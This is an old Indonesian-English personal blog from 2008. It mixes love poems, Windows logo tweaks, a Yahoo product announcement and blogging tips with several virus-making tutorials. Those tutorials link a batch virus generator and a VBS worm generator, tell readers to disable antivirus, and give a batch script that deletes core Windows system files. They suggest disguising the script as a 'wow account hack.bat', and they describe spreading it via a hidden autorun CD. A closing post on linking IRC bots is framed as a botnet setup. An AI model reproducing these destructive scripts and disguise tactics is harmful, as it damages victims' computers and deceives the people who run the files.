Minggu, 01 Juni 2008
Upoad Virus Disini
Atau Punya Antiviru Portable yang keren Tolong dunkz kontibisinya Untuk Mengupload disini
Jika komputer kamu terinfeksi virus tolong dunkz kasih samplenya kesini
Jumat, 23 Mei 2008
Maaf Jika Aq meNcinTai_Mu
Sejenak Q Berhenti di persimpangan bathin
Q Ti2p ego saat sunyi mengikuti_Q
Sulit Q Mengartikan alur kerinduan ini
Saat ini Akal_Q Sudah tak berakal
Karena Tangis akan meredakan waktu
Yg kini menyisakan tanya
RINDU ini untuk SIAPA????????
Akankah senyum_Mu tersulam kembali??
Akankah jiwa_Q Menemukan So2k_Mu
Karena Saat ini Aq ingin mengatakan
Mengubah Logo Windows STARTUP dan SHUT DOWN
1.Carilah file dengan nama logo.sys di komputer anda dengan fasilitas search.
2.Buka "paint" aplikasi pengolah gambar bawaan windows, nah buka aja logos.sys tadi dengan paint . Nah, file logo.sys itu adalah gambar yang bertuliskan it's now safe to shutdown your computer" inget kan???
Edit aja sesuka hati, kalo perlu tambahin cliptart kek atau.. apalaah.. setelah itu simpan filenya dengan nama "LOGOS.SYS" pada lokasi yang sama dengan "logo.sys"
3.Restart komputer anda, nah sekarang file logo.sys yang anda edit tadi bakalan nongol sebagai start up logo di win 98.
FYI, file logo.sys ini tidak bisa menampilkan banyak warna, jadi kadang2 warna yang kita edit kadang2 tidak sesuai dengan keinginan kita waktu keluar saat start up windows.
Tidak cuma startup logo saja bisa dirubah berikut file yang lain:
c:\logo.sys = logo startup
c:\windows\logow.sys = logo "Please wait....."
c:\windows\logos.sys = logo "it's safe now to turn of your computer"
selamat mencoba..
Tutorial Cara Membuat Sebuah Batch Virus
Sekarang saya akan Memerikan sebuah tutorial singkat membuat virus berjenis Batch.Pertama-Pertama kamu haruz download Sebuah Software yang bernama BVCK 0.1 ini adalah program untuk menghasilkan virusnya.klik disini untik mendownload programnya http://www.geocities.com/indonesiahackerlink/wiwik.ZIP ...Oh iya jangan lupa matiin dl Program AntiVirusmu,
Setelah loe Download Sekarang Extrack Programnya Lalu Klik Wiwik.exe dan sebuah Windows akan kluar dilayar Monitor,Ini akan berkata enter the name of the author, Tinggal Isi NAma Kamu. Setelah itu masukkan nama virus, Setelah Itu Kamu Harus Memilih Seberapa hebatnya Virus yang kan loe bwat,bisa membuat Virusmu Menyebar Lewat Outlook Express Kamu jg bisa Membuat Sebuat Victim Mouse Ini Akan Menjadi Virus Yang Cukup Kuat,Setelah selesai mengisi Pertanyaan Tentang Seberapa hebat Virusmu,Setelah Selesai Virusmu Belum Sepenuhnya Selesai Kau Harus Merubahnya Sehingga Menjadi .bat contoh Hacker.bat
Bila Ingin Membuat Virus Jenis Lain Loe bisa Baca
Cara Membuat Virus Sedehana Dengan Notepad
cara membuat virus dengan vbs worm
And Baca jg hacking cpnel dengan c99
Semoga beruntung
CAra BUAT VIRUS SEDerhana Dengan NOtePad
Ketemu lagi Dengan saya,Skrng saya akan mengajari Anda Cara Membuat Virus Batch,
Silahkan Bka Notepad
Copy COde Dibawah ini
@echo off
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ============= ADI love wiwik ==============
echo ============= Ngorok Team ==============
echo ============= SOlo,11 Mei 2008 ==============
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
goto xyz
lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
Kamis, 15 Mei 2008
How to make a virus
I used to think that making viruses had something to do with programming skills. I thought writing a program that could copy itself, spread itself, hide in other programs or files, find its way around on all these different computers, that surely had to be the summum of programming.
Maybe this once was true. Back in the old days, when viruses ware written in assembler, were small enough to hide in the boot sector of a floppy disk, were able to attach themselves to a file without anyone noticing (and files were quite small those days), had stealth capability, and could influence your hardware directly, bypassing the operating system.
So maybe, maybe in those days, creating viruses could be seen as an achievement, or as a sport. Now, any fool can do it. And judging by the number of viruses, a lot of them do.
Here's how.
- search the web for something like "Virus Construction Tool" or "Internet Worm Generator". Download it.
- run the program (click on its icon).
- fill in the form. Choose interesting names.
- check the boxes to indicate how you want this virus / worm to spread (e-mail, irc, ...)
- choose your options for 'payload'
click "Done". - click "create virus" or "generate"
- Save the file
- run it to see if it works.
This should create a visual basic script that will run on Windows computers and try to use the same Outlook application files to mass-mail itself. Much like the 'I love you' virus or the 'Ana Kournikova' worm.
Download The Vbs Generator Here
Senin, 12 Mei 2008
Inquisitor Joins the Yahoo! Search Team
Last year, Yahoo! Search launched Search Assist to help users find what they're looking for quickly and easily by providing query suggestions and related concepts in real-time. Today, Yahoo! Search is embracing the Mac community and offering similar search assistance features with the acquisition of Inquisitor software, a Safari browser plug-in.
Inquisitor 3, a search technology that auto-completes queries and delivers results right in Safari Web browser, is similar to Yahoo!'s existing Search Assist technology. Simply type in your query and websites will appear immediately, as well as suggestions for refining your search. Just as with Search Assist, the goal with Inquisitor is to help users find exactly the site they're looking for as quickly as possible.
The new version of Inquisitor removes affiliate ad links, simplifies the search provider selection interaction and refines the preferences user interface. Additionally, the new version provides quick access to Yahoo! Search however, existing users may still utilize their current default search engine or a different search engine entirely, such as a vertical alternative like Amazon or Flickr, if they prefer.
While search interface design has remained fairly utilitarian over the years, David Watanabe, founder and developer of Inquisitor, has done a fantastic job designing a simple and elegant UI. David and our team of macphiles will continue to innovate on both form and function for Inquisitor.
Mac users have been using the Inquisitor plug-in already and they seem to like it. It's a free download, so whether you're familiar with it or just trying it out for the first time with Yahoo! Search, let us know what you think in the comments below.
Ariel Seidman
Director of Product Management
Yahoo! Search
Minggu, 11 Mei 2008
How to create a batch virus.
Now im going to show you how to create a batch virus. Its kinda the same thing as the other one. Now first you need to download a program called BVCK 0.1 it will creates the virus. Its very very important that you click on the link BVCK06.zip and do not click on BVCK01.zip. Click on the link to download it http://www.geocities.com/indonesiahackerlink/wiwik.ZIP ... Now extract the files to the desktop create a folder called virus creator kit. Now press BVCK 0.1 and a cmd pop-up will shows on your screen. It says enter the name of the author, just enter the name of your self. Now enter the name of the virus, you must choose how powerfull you virus would be if you want to spread it via outlook express and if you wanna disable keyboard and mouse when the victim try to disable the virus, this is a pretty strong virus so be careful where you mouse and where you click on the screen, when you have been choosed the power of the virus, finish the virus creation and beside the history button you will see the uncompleted virus, the virus is almost ready, it dosnt contains to a program so name it as you want. Recommended is this: pc hack.bat a very very important thing is that you format must be .bat in the end, like this: (d2 hack tool.bat) its an example. Good luck.
How to create a virus
Now i will show you how to make a virus that removes a system file called system32. Follow the instruction how to create it. Do this on your own risk, becuse this is illegal
Step 1. Open your notepad, if you dont have notepad on your desktop, search on it.
Step 2. If you have your notepad up, type this:
@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"
when you have this text in your notepad, save the document on your deskop and name it as (something).bat ... Its very very important that you make the format to .bat mabye do it like this wow account hack.bat
Create the Virus autorun
copy to notepad
save in on autorun.inf
Good Luck...
Submit Your Blog To The Popular Search Enggine
you can Submit your blog/web to popular search enggine If You Want To get More Visitor To your Blog/Site,It Make Your Web/Blog get More Visitor
The Google submission URL is:
The Yahoo Submission URL is:
The MSN Submission URL is:
And If You Lazy To go to taht Url You Can Use This Tool,
Just Write Your web/blog and click submit,And You're Site/Blog Will Be Submit To Pupular Search Enggine.
Sabtu, 10 Mei 2008
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Jumat, 09 Mei 2008
Global warming

Global warming is the increase in the average temperature of the Earth's near-surface air and oceans since the mid-twentieth century, and its projected continuation.
Increasing global temperature will cause sea level to rise, and is expected to increase the intensity of extreme weather events and to change the amount and pattern of precipitation. Other effects of global warming include changes in agricultural yields, trade routes, glacier retreat, species extinctions and increases in the ranges of disease vectors.
Making a few small changes in your home and yard can lead to big reductions of greenhouse gas emissions and save money. Explore our list of nine simple steps you can take around the house and yard to reduce greenhouse gas emissions:
Can I be Your Soldier
With no way to shield yourself from the pain
Falling down again and again,
Surrounded by fire, wishing for rain.
Living life trapped in the depths of your mind,
with an iron case surrounding your heart.
Not being able to trust in anyone,
for to many times you've been ripped apart.
Can I be you soldier?
Rescuing you from all your pain,
carrying you off the battlefield,
through the fire and after the rain.
Tending to each emotional wound,
while dusting off that old iron case.
Making right all the wrong that was done to you,
putting that quality glow back in your face.
All these words I say to you,
Might not come as a surprise.
Because of all the other guys that came in your life,
telling you nothing but lies.
I can't tell you to trust me,
with all you've been through.
But everything I say here,
I say because I truly love you!
created by Adi N
this Poem is For Devina
Kamis, 08 Mei 2008
Add a Cool Slideshow to Your Blog
Picasa is a free photo management product by Google that I actually use for all my photos. The software organizes and can adjust your photo albums on your computer and then easily uploads them to your Picasa account. I love the ability to quickly upload pictures from my trips, etc and just send the url to my friends and family.
So if you already have a Picasa account and have pictures you’d like to include on your blog, you should check out this widget. If you don’t have Picasa yet, I highly recommend you download it for free by clicking on the link below.
After you select the photo album and settings you want to use, it gives you some code to paste into your site. You can either paste it into your post or add it to your sidebar by creating an html/javascript widget. Then just paste the code into the widget and save.
Here’s a screenshot of the widget being setup:
Notice how easy the setup process is. It provides the code to paste into your blog and then you’ll have a flash slideshow rotating through all your photos! Pretty cool. I was going to include a working demo but once you login to your account and start building a slideshow, it shows you real-time how it works. It’s worth checking out….enjoy!
Post subject: How to Setup a Botnet with 1.1.5 bots
You will need to have one bot that is a HUB and the rest of the bots will be LEAFS. I will show you the configuration for each of these.
We will make the HUB's Nick "Charlie" and the LEAF'S nick "Roger"
After you set the configuration for the bots and have them on IRC, I will then tell you what you must do in order to link them. BUT you must make sure their config files have the same settings as below.
Text in Italic Red you can enter your own info
STEP 1: HUB bot configurations
(Your configurations should look something like this)
set nick "Charlie" # This will be the nick your bot uses on IRC
set altnick "Charlie`" # This is the nick your bot will use if the other nick is taken
set username "Char" # This will appear before the @ in the hostname if ident is not running
set my-hostname "virtual.host.com" # This is the host your bot will use while on IRC
set my-ip "" # This is the IP of the host above (note: you can have either/or or none)
listen 12345 bots # This is the port your bot will listen on for other bots
listen 54321 users # This is the port your bot will listen for users to connect to (NOTE: You can also use "listen 12345 all" instead of those two lines
set passive 0 # with this set your bot will not accept user files from other bots. It will only send user files. 0 - shuts it off / 1 - turns it on
set share-users 1 # This sets your bot to share with other bots as long as they have theirs set to 1 and have the +s flag. 0 - shuts it off / 1 - turns it on
set learn-users 0 # This will allow users to be added to the bot if they msg your bot the hello command. Disable this if the only way you want people to be added to the bot is by the .adduser command. 0 - shuts it off / 1 - turns it on
unbind msg - hello *msg:hello # This is the default command which should be disabled for max security
bind msg - yourhello *msg:hello # Change yourhello to a word of your choice. This will be used when you first start your bot and you want to have it recognize you as the owner.
set network "EFNet" # This shows which Network your bot is on
set share-greet 0 # If this is on, the bots will share the users' info lines.
Set require-p 1 # If this is set to 1 it requires users to have the +p flag in order to join the party line
set open-telnets 0 # With this set to 1 people can Telnet to the bot an add themselves as a new user by typing NEW
set connect-timeout 15 # Sets the time in seconds the bot will wait for a Telnet, dcc, or bot connection before it disconnects.
STEP 2: LEAF bot configurations
(Your configurations should look something like this)
Fields with an ** are different from the HUBS configuration
set nick "Roger" # ** This will be the nick your bot uses on IRC
set altnick "Roger`" # ** This is the nick your bot will use if the other nick is taken
set username "rog" # ** This will appear before the @ in the hostname if ident is not running
set my-hostname "virtual.host.com" # This is the host your bot will use while on IRC
set my-IP "" # This is the IP of the host above (note: you can have either/or or none)
listen 3335 bots # ** This is the port your bot will listen on for other bots
listen 4445 users # ** This is the port your bot will listen for users to connect to (NOTE: You can also use "listen 12345 all" instead of those two lines
set passive 1 # ** with this set your bot will not accept user files from other bots. It will only send user files. 0 - shuts it off / 1 - turns it on
set share-users 1 # This sets your bot to share with other bots as long as they have theirs set to 1 and have the +s flag. 0 - shuts it off / 1 - turns it on
set learn-users 0 # This will allow users to be added to the bot if they msg your bot the hello command. Disable this if the only way you want people to be added to the bot is by the .adduser command. 0 - shuts it off / 1 - turns it on
unbind msg - hello *msg:hello # This is the default command which should be disabled for max security
bind msg - yourhello *msg:hello # Change yourhello to a word of your choice. This will be used when you first start your bot and you want to have it recognize you as the owner.
Set network "EFNet" # This shows which Network your bot is on
set share-greet 0 # If this is on, the bots will share the users' info lines.
Set require-p 1 # If this is set to 1 it requires users to have the +p flag in order to join the party line
set open-telnets 0 # With this set to 1 people can Telnet to the bot an add themselves as a new user by typing NEW
set connect-timeout 15 # Sets the time in seconds the bot will wait for a Telnet, dcc, or bot connection before it disconnects.
STEP 3: Adding and Linking bots to your HUB
OK, now we want to add your leaf bot, ROGER, to your HUB, Charlie.
DCC Chat or Telnet to Charlie (HUB) and type.
.+bot roger virtual.host.com:3335
format: .bot
Then you will need to give the bot flags. So type
.chattr roger +ofbs
+o - global ops
+f - friend
+b - bot
+s - will allow them to share user files
STEP 4: Making your LEAF bots connect to your HUB
First you will need to add Charlie (HUB) to your Roger (LEAF).
So DCC Chat or Telnet to Roger (LEAF) and type.
.+bot charlie virtual.host.com:1234
format: .bot
Then you will need to give you HUB some flags. So type
.chattr Charlie +ofbsh
+h - hub
+o - global ops
+f - friend
+b - bot
+s - will allow them to share user files
That's it!! :-]
Your bots should link automatically in a few seconds. If they don't make sure you have all the flags set right or type.
.link Charlie
and your bot will try and connect to Charlie